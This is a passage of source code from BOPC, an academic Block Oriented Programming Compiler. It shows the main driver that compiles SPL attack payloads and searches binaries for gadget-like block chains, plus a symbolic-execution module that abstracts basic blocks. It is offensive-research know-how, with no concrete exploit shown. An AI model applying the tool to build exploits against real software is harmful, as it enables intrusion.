filename: Abstraction's file name (if applicable) # :Ret: None. # def abstract( mark, mode, filename ): if mode == 'none': mark.abstract_cfg() # calculate the abstractions if mode == 'load': mark.load_abstractions(filename) # simply load the abstractions elif mode == 'save': mark.abstract_cfg() # calculate the abstractions mark.save_abstractions(filename) # and save them elif mode == 'saveonly': mark.abstract_cfg() mark.save_abstractions(filename) return -1 return 0 # --------------------------------------------------------------------------------------------- # capability_analyses(): Apply any (custom) analyses to the capabilities. # # :Arg cap: The capability object # :Ret: None. # def capability_analyses( cap ): dbg_prnt(DBG_LVL_0, 'Applying additional Capability analyses...') return ''' # analyze all islands # cap.analyze(P.CAP_LOOPS, P.CAP_STMT_MIN_DIST) # analyze a specific island # cap.analyze_island(0x400885, P.CAP_STMT_COMB_CTR) i = 0 def foo( graph ): global i print 'Visualing island %d' % i cap.visualize(graph, 'island_%d' % i, show_labels=True) i += 1 for _, d in graph.nodes_iter(data=True): print d['type'] # check capability.__add() for all keys # apply the callback to every island cap.callback( foo ) ''' # ------------------------------------------------------------------------------------------------- # main(): This is the main function of BOPC. # # Ret: None. # if __name__ == '__main__': args = parse_args() # process arguments set_dbg_lvl( args.dbg_lvl ) # set debug level in coreutils now = datetime.datetime.now() # get current time # ------------------------------------------------------------------------- # Display banner # ------------------------------------------------------------------------- print rainbow(textwrap.dedent(''' %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % % % ::::::::: :::::::: ::::::::: :::::::: % % :+: :+: :+: :+: :+: :+: :+: :+: % % +:+ +:+ +:+ +:+ +:+ +:+ +:+ % % +#++:++#+ +#+ +:+ +#++:++#+ +#+ % % +#+ +#+ +#+ +#+ +#+ +#+ % % #+# #+# #+# #+# #+# #+# #+# % % ######### ######## ### ######## % % % % Block Oriented Programming Compiler % % % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ''')) print comments print "[*] Starting BOPC %s at %s" % (VERSION, bolds(now.strftime("%d/%m/%Y %H:%M"))) # ------------------------------------------------------------------------- # BOPC operation: Emit SPL IR # ------------------------------------------------------------------------- if args.emit_IR and args.source: IR = C.compile(args.source) IR.compile() # compile the SPL payload IR = O.optimize(IR.get_ir()) IR.optimize(mode=args.optimizer) # optimize IR (if needed) IR.emit(args.source) # ------------------------------------------------------------------------- # BOPC operation: Trace Search # ------------------------------------------------------------------------- elif args.source and args.entry: IR = C.compile(args.source) IR.compile() # compile the SPL payload IR = O.optimize(IR.get_ir()) IR.optimize(mode=args.optimizer) # optimize IR (if needed) project, CFG = load(args.binary) mark = M.mark(project, CFG, IR, 'puts') if abstract(mark, args.abstractions, args.binary) > -1: entry = int(args.entry, 0) # get entry point X = mark.mark_candidate(sorted(map(lambda s : tuple(s.split('=')), args.mapping))) if not X: print 'abort'; exit() # visualize('cfg_cand', entry=entry, options=VO_DRAW_CFG|VO_DRAW_CANDIDATE) # extract payload name (without the extenstion) payload_name = ntpath.basename(args.source) payload_name = os.path.splitext(payload_name)[0] try: options = { 'format' : args.format, 'solutions' : args.findall, 'mapping-id' : int(args.mapping_id), 'mapping' : sorted(map(lambda s : tuple(s.split('=')), args.mapping)), 'filename' : '%s-%s' % (args.binary, payload_name), 'enum' : args.enum_mappings, 'simulate' : False, '#mappings' : 0, '#solutions' : 0 } except ValueError: fatal("'mapping' argument must be an integer") tsearch = S.search(project, CFG, IR, entry, options) tsearch.trace_searching(mark) # ----------------------------------------------------------------- # Show some statistics # ----------------------------------------------------------------- emph("Trace Searching Statistics:" ) emph("\tUsed Simulation? %s" % bolds(options['simulate'])) emph("\t%s Mapping(s) tried" % bold(options['#mappings'])) emph("\t%s Solution(s) found" % bold(options['#solutions'])) # ------------------------------------------------------------------------- # BOPC operation: Dump abstractions # ------------------------------------------------------------------------- elif args.abstractions == 'saveonly': # IR is useless; we're only dumping abstractions project, CFG = load(args.binary) mark = M.mark(project, CFG, None, 'puts') abstract(mark, args.abstractions, args.binary) # ------------------------------------------------------------------------- # BOPC operation: Application Capability # ------------------------------------------------------------------------- elif args.capabilities: # IR is useless; we're measuring capability project, CFG = load(args.binary) mark = M.mark(project, CFG, None, 'puts') abstract(mark, args.abstractions, args.binary) # cfg is loaded with abstractions cap = P.capability(CFG, args.binary) options = 0 for stmt in args.capabilities: options = options | { 'all' : P.CAP_ALL, 'regset' : P.CAP_REGSET, 'regmod' : P.CAP_REGMOD, 'memrd' : P.CAP_MEMRD, 'memwr' : P.CAP_MEMWR, 'call' : P.CAP_CALL, 'cond' : P.CAP_COND, 'load' : P.CAP_LOAD, 'save' : P.CAP_SAVE, 'noedge' : P.CAP_NO_EDGE }[stmt] # argparse ensures no KeyError cap.build(options=options) # build the Capability Graph cap.save() # save nodes to a file cap.explore() # explore Islands capability_analyses( cap ) # ------------------------------------------------------------------------- # BOPC operation: Single block abstraction # ------------------------------------------------------------------------- elif args.binary and args.absblk: project = angr.Project(args.binary, load_options={'auto_load_libs': False}) load(args.binary) abstr = A.abstract_ng(project, int(args.absblk, 0)) dbg_prnt(DBG_LVL_0, 'Abstractions for basic block 0x%x:' % int(args.absblk, 0)) for a, b in abstr: if a == 'regwr': dbg_prnt(DBG_LVL_0, '%14s :' % a) for c, d in b.iteritems(): dbg_prnt(DBG_LVL_0, '\t\t%s = %s' % (c, str(d))) else: dbg_prnt(DBG_LVL_0, '%14s : %s' % (a, str(b))) # ------------------------------------------------------------------------- # invalid BOPC operation # ------------------------------------------------------------------------- else: fatal('Invalid configuration argument') emph('') emph('BOPC has finished.', DBG_LVL_0) emph('Have a nice day!', DBG_LVL_0) emph('Bye bye :)', DBG_LVL_0) warn('A segmentation fault may occur now, due to an internal angr issue') # --------------------------------------------------------------------------------------- ================================================ FILE: source/README.md ================================================ # Block Oriented Programming Compiler (BOPC) ___ ### BOPC Implementation Overview ![alt text](./images/BOPC_overview.png) ### Source Code Overview | File | Description | | ---------------------------------|---------------------------------------------| | [BOPC.py](./BOPC.py) | Main file | | [absblk.py](./absblk.py) | Basic block abstraction | | [calls.py](./calls.py) | Supported library and system calls | | [capability.py](./capability.py) | Application Capability | | [compile.py](./compile.py) | SPL compiler | | [config.py](./config.py) | Configuration file | | [coreutils.py](./coreutils.py) | Shared utils across modules | | [delta.py](./delta.py) | Delta graph | | [map.py](./map.py) | Mapping across registers and variables | | [mark.py](./mark.py) | Marking and re-Marking CFG | | [optimize.py](./optimize.py) | SPL optimizer | | [output.py](./output.py) | Write solutions to a file | | [path.py](./path.py) | CFG shortest paths | | [search.py](./search.py) | Trace Searching algorithm | | [simulate.py](./simulate.py) | Concolic execution | ___ ================================================ FILE: source/absblk.py ================================================ #!/#!/usr/bin/env python2 # ------------------------------------------------------------------------------------------------- # # ,ggggggggggg, _,gggggg,_ ,ggggggggggg, ,gggg, # dP"""88""""""Y8, ,d8P""d8P"Y8b, dP"""88""""""Y8, ,88"""Y8b, # Yb, 88 `8b,d8' Y8 "8b,dPYb, 88 `8b d8" `Y8 # `" 88 ,8Pd8' `Ybaaad88P' `" 88 ,8Pd8' 8b d8 # 88aaaad8P" 8P `""""Y8 88aaaad8P",8I "Y88P' # 88""""Y8ba 8b d8 88""""" I8' # 88 `8bY8, ,8P 88 d8 # 88 ,8P`Y8, ,8P' 88 Y8, # 88_____,d8' `Y8b,,__,,d8P' 88 `Yba,,_____, # 88888888P" `"Y8888P"' 88 `"Y8888888 # # The Block Oriented Programming (BOP) Compiler - v2.1 # # # Kyriakos Ispoglou (ispo) - ispo@purdue.edu # PURDUE University, Fall 2016-18 # ------------------------------------------------------------------------------------------------- # # # absblk.py: # # This module implements the basic block "abstractions". Abstraction is a process that summarizes # a basic block into the "impact" on program's state. # # ------------------------------------------------------------------------------------------------- from coreutils import * import signal import simuvex import claripy import archinfo import angr # ------------------------------------------------------------------------------------------------ # Constant Definitions # ------------------------------------------------------------------------------------------------ _STACK_SZ = 0x1000 # size of symbolic stack # ------------------------------------------------------------------------------------------------- # abstract_ng: This class implements the next generation of the basic block "abstraction". So # far, the following abstractions are supported: # # * * Register Writes * * # A dictionary that contains all registers that are being written. The "write" information is # another dictionary with the following fields: # # * type : Can be 'concrete', 'deref', 'mod' or 'clob'. A register is of type 'clob' # when, it does not fall to any of the other types # * const : ('concrete' and 'mod' types). The constant value that is written to the # register # * writable : ('concrete' types). If the constant value is a valid and writable memory # address, then this field is set to True # * op : ('mod' types). The modification operator # * addr : ('deref' types). The address that register value is loaded from # * deps : ('deref' types). Any registers that participate in addr field # * sym : ('deref' types). A mapping between registers and their symbolic variables # * memrd : ('deref' types). When the register write can be used as a memory read, this # field contains the size of the memory read in bytes (1,2,4,8). Otherwise it # is set to None # # Example: # regwr = { # rsp : {'type': 'concrete', 'const': 576460752303357888L, 'writable': True }, # rcx : {'type': 'deref', 'addr': , 'deps': ['rsi']}, # r9 : {'type': 'mod', 'op': '+', 'const': 1337L} # } # # # * * Memory Reads * * # A list of tuples (address, size) for every memory read. # # Example: # memrd = set([(>, 64), (>, 64)]) # # # * * Memory Writes * * # A list of tuples (address, data) for every memory write (len(data) indicates the size) # # Example: # memwr = set([(>, >), # (>, >)]) # # # * * Concrete Writes * * # A list of tuples (address, size) for every concrete memory write. # # Example: # conwr = set([(576460752303359992L, 64), (576460752303359968L, 64)]) # # # * * SPL Memory Writes * * # A list of dictionaries for every SPL memory write (memory writes that are in the form: # "mov [rax], rbx"). Each dictionary contains the following fields: # # * mem : The register that holds the address to write (string) # * val : The register that holds the value to be written (string) # * size : The number of bytes to write (e.g., mov [rax], cl, mov [rbx], dx) # * sym : A mapping between registers and their symbolic variables # # Example: # splmemwr = [{ # 'mem' : 'rbx', # 'val' : 'rax', # 'size' : 4, # 'sym' : {'rax': , 'rbx': } # }] # # # * * Calls * * # A dictionary with the following fields: # # * type : Can be 'syscall', or 'libcall' # * name : The name of the call # # Example: # call = {'type': 'libcall', 'name': u'puts'} # # # * * Conditional Jumps * * # A dictionary with the following fields: # # * form : The form of the conditional jump ('simple' / 'extended') # * reg : The register that participates in the conditional jump # * const : The constant value that register is compared against # * op : The comparison operator # * mod_op : ('extended' types). The operator of the register modification # * mod_const : ('extended' types). The constant of the register modification # # Example: # cond = {'reg': 'r11', 'op': '==', 'const': 11L} # cond = {'mod_op': '^', 'const': 0L, 'form': 'extended', 'op': '=='} # # # * * Symbolic Variables * * # A dictionary that maps the symbolic variables to their actual addresses that they correspond # # Example: # symvar = {' : 0x7fffffffffef1e8} # # # * * * ---===== TODO list =====--- * # # [1]. Make absblk more precise i.e., check the order of memory writes # [2]. Move this list at the beginning of the file. # class abstract_ng( object ): ''' ======================================================================================= ''' ''' AUXILIARY FUNCTIONS ''' ''' ======================================================================================= ''' # --------------------------------------------------------------------------------------------- # __reg_w(): Analyze the register writes of the symbolic execution. # # :Arg state: Program's state after symbolic execution # :Ret: None. # def __reg_w( self, state ): visited = set() # visited registers for action in reversed(state.actions): # for every action (start backwards) if not (action.type == 'reg' and action.action == 'write'): continue # we care about register writes only try: # we only care about the most recent register write only reg = self.__proj.arch.register_names[action.offset] except KeyError: continue # get the last write only if reg not in HARDWARE_REGISTERS or reg in visited: continue data = { } # various data related to the write visited.add(reg) # make sure that you won't visit this again # --------------------------------------------------------------------------- # If some address (initialized or not) is used as a dereference, the regwr # entry for that register must be preserved (we should not overwrite register # with the actual value in that address) # --------------------------------------------------------------------------- if reg in self.regwr and self.regwr[ reg ]['type'] == 'deref': continue # The register is being modified, so we start by marking it as clobbering if reg not in self.regwr: self.regwr[ reg ] = {'type' : 'clob'} # ----------------------------------------------------------------- if action.data.concrete: # if register gets a concrete value, value = state.se.eval(action.data) # concretize it data['type'] = 'concrete' # set data data['const'] = value data['writable'] = True # initialize this first in_section = False # now, check whether this value is a writable address try: # The problem: There are some weird sections (.e.g., ".comment") whose VA # starts from 0. Therefore, we may have register writes with constants like # 1, 2 and so on, which are marked as +W. This means that at the end we can # have memory reservations (writes) at those addresses. Our old approach with # "state.memory.permissions(value)" doesn't work here. # # So iterate over ELF sections looking for it for _, sec in self.__proj.loader.main_object.sections_map.iteritems(): # it's possible for the value to be part of >1 sections (usually when # section's VA is 0; sec.vaddr != 0). We mark value as +W only when *all* # sections are writable if sec.contains_addr(value): data['writable'] &= sec.is_writable in_section = True # if can't find section (b/c it's generated at runtime, like .stack) if not in_section: # TODO: check if value+1, value+2, etc. are writable as well rwx = state.memory.permissions(value) if state.se.eval(rwx) & 2 == 2: # is +W (2nd bit) set? data['writable'] = True else: data['writable'] = False except Exception, e: # page does not exist at given address data['writable'] = False # not writable at all try: # special case when a stack address is in the next page (-W) if value & 0x07ffffffffff0000 == 0x07ffffffffff0000: rwx = state.memory.permissions(value-0x4000) # give it a second change if state.se.eval(rwx) & 2 == 2: data['writable'] = True except Exception, e: # or angr.errors.SimMemoryError pass # ----------------------------------------------------------------- else: # register doesn't get a concrete value # register gets an expression. Check for simple register modifications: # " = " (we can easily scale this to = ) # Note that modified register should be the same with action.offset node = [leaf for leaf in action.data.recursive_leaf_asts] # we need an AST with depth 2, 2 leaves and 1 variable (i.e., register) if action.data.depth == 2 and len(action.data.variables) == 1 and len(node) == 2: try: data['op'] = { # cast operator '__add__' : '+', '__sub__' : '-', '__mul__' : '*', '__div__' : '/', '__and__' : '&', '__or__' : '|', '__xor__' : '^', '__invert__' : '~', '__lshift__' : '<<', '__rshift__' : '>>' }[ action.data.op ] # if constant is on the left, swap sides if node[0].op == 'BVV' and node[0].concrete: node[0], node[1] = node[1], node[0] # check if we're in the form: if node[0].op == 'BVS' and self.__symreg[node[0]] == reg and \ node[1].op == 'BVV' and node[1].concrete: data['type'] = 'mod' data['const'] = state.se.eval(node[1]) else: # not in the right form continue except KeyError: # __symreg() threw an exception continue # ----------------------------------------------------------------------- # Consider the following case: # .text:000000000040BA49 mov eax, [rbp+tfd] # .text:000000000040BA52 mov edi, eax ; fd # # Here, edi gets exactly the same value with eax, but edi is marked as # 'clob', while eax as 'deref'. The root cause is that edi does not # participate in any memory reads and the assigned value is not constant # (i.e., it doesn't come directly from a register). # # To fix that we check whether a 'clob' register has *exactly* the same # symbolic value with another one (eax in our example), and if so we # assign the same regwr entry to it. # ----------------------------------------------------------------------- else: # iterate over previous writes for reg2, val in self.__reg_rawval.iteritems(): try: # check if raw values match if reg != reg2 and val.shallow_repr() == action.data.shallow_repr(): self.regwr[ reg ] = self.regwr[ reg2 ] pass except KeyError: pass # ----------------------------------------------------------------- if data: self.regwr[ reg ] = data # set data to this register # --------------------------------------------------------------------------------------------- # __mem_r(): Analyze the memory reads of the symbolic execution. # # :Arg state: Program's state after symbolic execution # :Ret: None. # def __mem_r( self, state ): for action in state.actions: # for every action if not (action.type == 'mem' and action.action == 'read'): continue # we care about memory reads only # simply add address (can be an expression) and size to the list self.memrd.add( (action.addr, len(action.data)) ) # --------------------------------------------------------------------------------------------- # __mem_w(): Analyze the memory writes of the symbolic execution. # # :Arg state: Program's state after symbolic execution # :Ret: None. # def __mem_w( self, state ): for action in state.actions: # for every action if not (action.type == 'mem' and action.action == 'write'): continue # we care about memory writes only # simply add address (can be an expression) and data to the list self.memwr.add( (action.addr, action.data) ) if action.addr.concrete: # if address is concrete # concretize it as well self.conwr.add( (state.se.eval(action.addr), len(action.data)) ) deps = [ ] symtab = { } # ----------------------------------------------------------------- # Check for memory register writes (mov [rax], rbx) # # In this case, both action.addr and action.data will consist of a # single leaf in their ast which is a register # ----------------------------------------------------------------- mem_reg = [leaf for leaf in action.addr.recursive_leaf_asts] val_reg = [leaf for leaf in action.data.recursive_leaf_asts] # print 'ADDR', mem_reg, action.addr # print 'ADDR', val_reg, action.addr # check AST have a single leaf if len(mem_reg) == 1 and len(val_reg) == 1: mem, val = None, None # check whether the leaf is a register for sym, nam in self.__symreg.iteritems(): # skip registers that are not symbolic (e.g., rbp) if isinstance(sym.args[0], str) and sym.args[0] in mem_reg[0].shallow_repr(): symtab[nam] = sym mem = nam elif isinstance(sym.args[0], str) and sym.args[0] in val_reg[0].shallow_repr(): symtab[nam] = sym val = nam # if both leaves are registers we have a memory register write! if mem and val: self.splmemwr.append({ 'mem' : mem, 'val' : val, 'size' : int(action.size) >> 3, 'sym' : symtab, }) # --------------------------------------------------------------------------------------------- # __call(): Analyze the (sys|lib)calls of the symbolic execution. Because we're analyzing a # single basic block, we can have up to one such (sys|lib)call (the last instruction). # # :Arg state: Program's state after symbolic execution # :Ret: None. # def __call( self, state ): blk = self.__proj.factory.block(self.__entry) # check if symbolic execution stopped on a syscall # (don't use "if self.__proj._simos.is_syscall_addr(state.addr)"; it throws exceptions) if blk.vex.jumpkind == "Ijk_Sys_syscall": # a system call was invoked # we assume that simproc.cc == SimCCAMD64LinuxSyscall simproc = self.__proj._simos.syscall(state) self.call['type'] = 'syscall' self.call['name'] = simproc.display_name # self.call['nargs'] = simproc.num_args else: if blk.vex.jumpkind != "Ijk_Call": # skip block when it doesn't end with a call return # check if symbolic execution stopped on a library call for action in reversed(state.actions): # for every action if action.type != 'exit': continue # we care about branches only # concretize function's entry point target = state.se.eval(action.target) # Note: Before you use kb.functions, calculate CFG (e.g., analyses.CFGFast()) try: self.call['type'] = 'libcall' self.call['name'] = self.__proj.kb.functions[target].name except Exception: # no function name at that address self.call = { } # --------------------------------------------------------------------------------------------- # __cond(): Analyze the conditional jump of the symbolic execution. Because we're analyzing a # single basic block, we can have up to one conditional jump. # # :Arg state: Program's state after symbolic execution # :Ret: None. # def __cond( self, state ): for action in reversed(state.actions): # for every action if not (action.type == 'exit' and action.exit_type == 'conditional'): continue # we care about conditional jumps only # as in __reg_w(), we only care about simple conditional jumps: " " if len(action.condition.variables) == 1: try: self.cond['op'] = { # cast operator '__eq__' : '==', '__ne__' : '!=', '__le__' : '<=', '__lt__' : '<', '__ge__' : '>=', '__gt__' : '>', 'SGT' : '>', 'SGE' : '>=', 'SLT' : '<', 'SLE' : '<=', 'UGT' : '>', # do not distinguish signed/unsigned operators 'UGE' : '>=', 'ULT' : '<', 'ULE' : '<=', }[ action.condition.op ] except KeyError: warn('Unknown conditional jump operator "%s"' % action.condition.op) self.cond = { } return node = [leaf for leaf in action.condition.recursive_leaf_asts] # ----------------------------------------------------------------------- # Check if we're in the simple form: # ----------------------------------------------------------------------- if len(node) == 2: # we need 2 leaves + 1 operator self.cond['form'] = 'simple' # we're in the simple form try: # swap register and constant if needed if node[1].op == 'BVS' and node[0].op == 'BVV' and node[0].concrete: node[0], node[1] = node[1], node[0] # if we're in the right form (reg and const), we have our condition if node[0].op == 'BVS' and node[1].op == 'BVV' and node[1].concrete: self.cond['reg'] = self.__symreg[node[0]] self.cond['const'] = state.se.eval(node[1]) else: self.cond = { } # not in the right form return except KeyError: # if not in the right form, __symreg() will throw a KeyError exception self.cond = { } return # ----------------------------------------------------------------------- # Check if we're in the extended form: ( ) # (example: ">") # # This is when the iterator (register) gets modified and compared at the # same basic block. # ----------------------------------------------------------------------- elif len(node) == 3: # we need 3 leaves and 2 operators self.cond['form'] = 'extended' # we're in the extended form try: # get left and right side of the comparison left, right = action.condition.split( action.condition.op ) # if the constant is on the left side, swap sides if left.op == 'BVV' and left.concrete: left, right = right, left mod_ops = { # register modification operations '__add__' : '+', '__sub__' : '-', '__mul__' : '*', '__div__' : '/', '__and__' : '&', '__or__' : '|', '__xor__' : '^', '__invert__' : '~', '__lshift__' : '<<', '__rshift__' : '>>' } # if the left side is a modification and the right side a constant if left.op in mod_ops and right.op == 'BVV' and right.concrete: self.cond['const'] = state.se.eval(right) self.cond['mod_op'] = mod_ops[ left.op ] reg, const = left.split( left.op ) # if the constant is on the left side, swap sides if reg.op == 'BVV' and reg.concrete: reg, const = const, reg # if the modification uses a constant and a register if reg.op == 'BVS' and reg in self.__symreg and \ const.op == 'BVV' and const.concrete: self.cond['reg'] = self.__symreg[reg] self.cond['mod_const'] = state.se.eval(const) else: self.cond = { } # something is not in the right form return else: self.cond = { } return except ValueError: # != 2 values to split() self.cond = { } return # ----------------------------------------------------------------------- # Otherwise we're not in the right form # ----------------------------------------------------------------------- else: self.cond = { } continue # The problem here, is that simgr sometimes "inverts" the condition, so the # "target" basic block is the block immediately after the current block. To # be consistent, we have to "invert" the operator, so the target basic block # is executed when the jump is taken. blk = self.__proj.factory.block(self.__entry) # check if the target is the next block (assume action.target is concrete) if state.se.eval(action.target) == blk.addr + blk.size: self.cond['op'] = { # invert the condition '==' : '!=', '!=' : '==', '>' : '<=', '>=' : '<', '<' : '>=', '<=' : '>' }[ self.cond['op'] ] break # there's up to 1 conditional jump # --------------------------------------------------------------------------------------------- # __add_sym_vars(): This function extracts all (memory) symbolic variables from an expression. # For instance, given the expression: , we want to # map the variable 'mem_7fffffffffef1e8_82_64' to its actual address: 0x7fffffffffef1e8. # # :Arg addr_expr: The address expression to get variables from # :Ret: None. # def __add_sym_vars( self, addr_expr ): # A memory symbolic variable is in the form: mem_ADDRESS_RANDOM_SIZE. The AST leaf # will be like this: "" # # We want to extract the ADDRESS and SIZE fields for leaf in addr_expr.recursive_leaf_asts: # for each leaf in the AST leafstr = leaf.shallow_repr() # cast it to sting # if leaf is a memory variable, extract its address and its size if re.search(r'mem_[0-9a-f]+_[0-9]+_[0-9]+', leafstr): _, addr, rand, size = leafstr.split('_') # size might be followed by the "{UNINITIALIZED}" keyword, so it must be dropped # if not the ">" must also be dropped size = size.replace("{UNINITIALIZED}>", "").replace(">", "") # add the symbolic variable to the map self.symvars[ leaf ] = (int(addr, 16), int(size, 10) >> 3) # --------------------------------------------------------------------------------------------- # __memread_callback(): This function is invoked every time that a memory read operation is # performed. # # :Arg state: Current state to read memory from # :Ret: None. # def __memread_callback( self, state ): if self.__callback_mutex == 1: # if mutex is taken, return return self.__callback_mutex = 1 # get lock # --------------------------------------------------------------------- # If address is part of the .bss/.data, it will be initialized with a # default value of 0. However, it can get any value (due to AWP) so it # should get a symbolic value. # --------------------------------------------------------------------- # get ELF sections that give default values to their uninitialized variables bss = self.__proj.loader.main_object.sections_map[".bss"] data = self.__proj.loader.main_object.sections_map[".data"] addr = state.se.eval(state.inspect.mem_read_address) # print '=== READ', hex(state.inspect.instruction), hex(addr) # check if address is inside .bss or .data sections if bss.min_addr <= addr and addr <= bss.max_addr or \ data.min_addr <= addr and addr <= data.max_addr: # This is also works, but is for Big Endian: # state.memory.make_symbolic('mem', state.inspect.mem_read_address, length) # make address symbolic symv = state.se.BVS("mem_%x" % addr, state.inspect.mem_read_length << 3) state.memory.store(state.inspect.mem_read_address, symv, state.inspect.mem_read_length, endness=archinfo.Endness.LE) # we should read it to update state.inspect.mem_read_expr state.memory.load(state.inspect.mem_read_address, state.inspect.mem_read_length, endness=archinfo.Endness.LE) # ------------------------------------------------------------------------------- # Identifying dereferences is a two stage process. Here (1st step) we capture all # memory load information (which happens before the register write) that happen # at this instruction (x64 has 1 distinct memory read per insruction; however # instructions like popad do multiple register writes, but this is not an issue # here). # ------------------------------------------------------------------------------- self.__load[ state.inspect.instruction ] = ( state.inspect.mem_read_address, state.inspect.mem_read_length, state.inspect.mem_read_expr # this will be updated ) # associate memory expression with memory address (needed for later on) self.__mem2addr[ state.inspect.mem_read_expr.shallow_repr() ] = \ (state.inspect.mem_read_address, state.inspect.mem_read_length) # extract memory symbolic variables self.__add_sym_vars( state.inspect.mem_read_address ) self.__callback_mutex = 0 # release lock # --------------------------------------------------------------------------------------------- # __regwrite_callback(): This function is invoked every time that a register write operation # is performed. # # :Arg state: Current state to write register to # :Ret: None. # def __regwrite_callback( self, state ): if self.__callback_mutex == 1: # if mutex is taken, return return self.__callback_mutex = 1 # get lock try: # get register that is being written reg = self.__proj.arch.register_names[state.inspect.reg_write_offset] except KeyError: # just in case return # TODO: Regwrite only checks writes, but it doesn't check if the previous value perists after # .text:000000000040BCEA mov eax, [rbp+ac] # .text:000000000040BCF0 cdqe # .text:000000000040BCF2 shl rax, 3 # .text:000000000040BCF6 mov rcx, rax # .text:000000000040BCF9 add rcx, [rbp+nargv] # # ('sudo' example) # # We should add some checks to test whether the regwrite is "mov" or something else # print '--------------- ', hex(state.addr), hex(state.inspect.instruction), reg, # state.inspect.reg_write_expr # remember the "raw" value that is being written to the register self.__reg_rawval[ reg ] = state.inspect.reg_write_expr if reg not in HARDWARE_REGISTERS: # we only care about specific registers self.__callback_mutex = 0 # release lock return # ------------------------------------------------------------------------------- # This is the 2nd step of the dereference identification process. At this point # we match the instruction that writes a register with the instruction that read # from memory. This is because we want to match the memory read expression with # the register write. # ------------------------------------------------------------------------------- elif state.inspect.instruction in self.__load: addr, length, _ = self.__load[ state.inspect.instruction ] # ok we have a dereference! deps = [ ] # dependent registers symtab = { } # find register dependencies on the address (e.g., rsi on ) for sym, nam in self.__symreg.iteritems(): # skip registers that are not symbolic (e.g., rbp) if isinstance(sym.args[0], str) and sym.args[0] in addr.shallow_repr(): deps.append(nam) symtab[nam] = sym # there might be dependencies with constant memory addresses as well (i.e., reading # from global variables). Such dependencies are handled during trace searching, so # we ignore them for now. However the register dependencies are needed to check # whether a register mapping is valid or not. # if "deps" has a single element, we know that a register is containted in "addr" # expression. If also that expression has a single node, we know that this will be # that register. if len(deps) == 1 and len([leaf for leaf in addr.recursive_leaf_asts]) == 1: memrd = length else: memrd = None # (if basic block has >1 dereferences on the same register, use the most recent one) self.regwr[ reg ] = { # set data 'type' : 'deref', 'addr' : addr, 'deps' : deps, 'sym' : symtab, 'memrd' : memrd } # ------------------------------------------------------------------------------- # The current approach for detecting dereferences is not transitive. Consider the # following example: # mov rcx, [rsi + 0x10] # mov rdi, rcx # # In the 2nd register write, rdi gets an unconstrained symbolic variable (e.g., # >) and therefore it's of # type 'clob'. However, we want rdi to be treated in the same way with rcx, as # they both have the exact same value. Because SE engine gives a unique symbolic # variable on every memory cell, we can associate them with their addresses. # Thus, when a register gets a random symbolic value, we can figure out whether # it is actually a dereference. # ------------------------------------------------------------------------------- elif state.inspect.reg_write_expr.shallow_repr() in self.__mem2addr: addr, length = self.__mem2addr[ state.inspect.reg_write_expr.shallow_repr() ] # this code is copy-pasta from above deps = [ ] symtab = { } for sym, nam in self.__symreg.iteritems(): if isinstance(sym.args[0], str) and sym.args[0] in addr.shallow_repr(): deps.append(nam) symtab[nam] = sym if len(deps) == 1 and len([leaf for leaf in addr.recursive_leaf_asts]) == 1: memrd = length else: memrd = None self.regwr[ reg ] = { 'type' : 'deref', 'addr' : addr, 'deps' : deps, 'sym' : symtab, 'memrd' : memrd } # ------------------------------------------------------------------------------- self.__callback_mutex = 0 # release lock # --------------------------------------------------------------------------------------------- # __sig_handler(): Symbolic execution may take forever to complete. To deal with it, we set # an alarm. When the alarm is triggered, this singal handler is invoked and throws an # exception that causes the symbolic execution to halt. # # :Arg signum: Signal number # :Arg frame: Current stack frame # :Ret: None. # def __sig_handler( self, signum, frame ): if signum == signal.SIGALRM: # we only care about SIGALRM # angr may ignore the exception, so let's throw many of them :P raise Exception("Alarm triggered after %d seconds" % ABSBLK_TIMEOUT) raise Exception("Alarm triggered after %d seconds" % ABSBLK_TIMEOUT) raise Exception("Alarm triggered after %d seconds" % ABSBLK_TIMEOUT) raise Exception("Alarm triggered after %d seconds" % ABSBLK_TIMEOUT) # --------------------------------------------------------------------------------------------- ''' ======================================================================================= ''' ''' CLASS INTERFACE ''' ''' ======================================================================================= ''' # --------------------------------------------------------------------------------------------- # __init__(): Class constructor. This function initializes the environment for the symbolic # execution, it executes the basic block, and performs the abstraction. # # :Arg project: Instance of angr project # :Arg addr: Entry point of the basic block # :Ret: None. # def __init__( self, project, addr ): self.__proj = project # we'll need these self.__entry = addr # --------------------------------------------------------------------- # initialize abstraction variables # --------------------------------------------------------------------- self.regwr = { } # all register writes for that block self.memrd = set() # all memory reads for that block self.memwr = set() # all memory writes for that block self.conwr = set() # all concrete memory writes for that block self.splmemwr = [ ] # all memory register writes for that block self.call = { } # function/system call (if any) for that block self.cond = { } # conditional jumps (if any) for that block self.symvars = { } # symbolic variables for memory self.__load = { } # memory loads (for internal use) self.__mem2addr = { } # map between memory expressions and addresses self.__mem = { } self.__reg_rawval = { } # --------------------------------------------------------------------- # Create a blank state and prepare it for symbolic execution. # # TODO: Check options again # --------------------------------------------------------------------- inist = self.__proj.factory.blank_state( # create a blank state addr=addr, # set address #mode='symbolic', add_options={ # configure options simuvex.o.AVOID_MULTIVALUED_READS, simuvex.o.AVOID_MULTIVALUED_WRITES, simuvex.o.NO_SYMBOLIC_JUMP_RESOLUTION, simuvex.o.CGC_NO_SYMBOLIC_RECEIVE_LENGTH, simuvex.o.NO_SYMBOLIC_SYSCALL_RESOLUTION, simuvex.o.TRACK_ACTION_HISTORY, # newly added option simuvex.o.SYMBOLIC_INITIAL_VALUES }, remove_options=simuvex.o.resilience_options | simuvex.o.simplification ) # configure more options (add/remove) inist.options.discard(simuvex.o.CGC_ZERO_FILL_UNCONSTRAINED_MEMORY) inist.options.update( { simuvex.o.TRACK_REGISTER_ACTIONS, simuvex.o.TRACK_MEMORY_ACTIONS, simuvex.o.TRACK_JMP_ACTIONS, simuvex.o.TRACK_CONSTRAINT_ACTIONS } ) # --------------------------------------------------------------------- # initialize all registers with a symbolic variable # --------------------------------------------------------------------- inist.regs.rax = inist.se.BVS("rax", 64) # give convenient names inist.regs.rbx = inist.se.BVS("rbx", 64) inist.regs.rcx = inist.se.BVS("rcx", 64) inist.regs.rdx = inist.se.BVS("rdx", 64) inist.regs.rsi = inist.se.BVS("rsi", 64) inist.regs.rdi = inist.se.BVS("rdi", 64) # rbp may also needed as it's mostly used to access local variables (e.g., # rax = [rbp-0x40]) but some binaries don't use rbp and all references are # rsp related. In these cases it may worth to use rbp as well. if 